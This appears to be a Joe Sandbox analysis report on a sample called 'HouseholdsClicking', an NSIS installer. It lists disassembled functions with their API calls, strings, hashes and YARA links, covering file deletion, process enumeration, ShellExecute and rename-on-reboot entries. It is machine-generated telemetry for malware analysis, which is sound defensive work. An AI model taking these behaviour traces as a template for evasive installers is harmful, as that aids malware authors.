SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
@, xrefs: 00404BBC
, xrefs: 00404F65
M, xrefs: 00404B6F

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
Delete: DeleteFile failed("%s"), xrefs: 00406E29
ptF, xrefs: 00406D1A
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
Delete: DeleteFile("%s"), xrefs: 00406DE8

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

name, xrefs: 00406FEB
%s: failed opening file "%s", xrefs: 00406F38
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
F, xrefs: 00406858
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

PSAPI.DLL, xrefs: 00406490
Process32FirstW, xrefs: 004065E9
Unknown, xrefs: 00406528
EnumProcesses, xrefs: 004064AE
Module32FirstW, xrefs: 004065FF
Process32NextW, xrefs: 004065F4
EnumProcessModules, xrefs: 004064B6
GetModuleBaseNameW, xrefs: 004064C0
CreateToolhelp32Snapshot, xrefs: 004065E1
Module32NextW, xrefs: 0040660A
Kernel32.DLL, xrefs: 004065C7

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
N, xrefs: 00404298
F, xrefs: 004042D3

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
plF, xrefs: 00406B54
%s=%s, xrefs: 00406B6F
^F, xrefs: 00406ACF
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

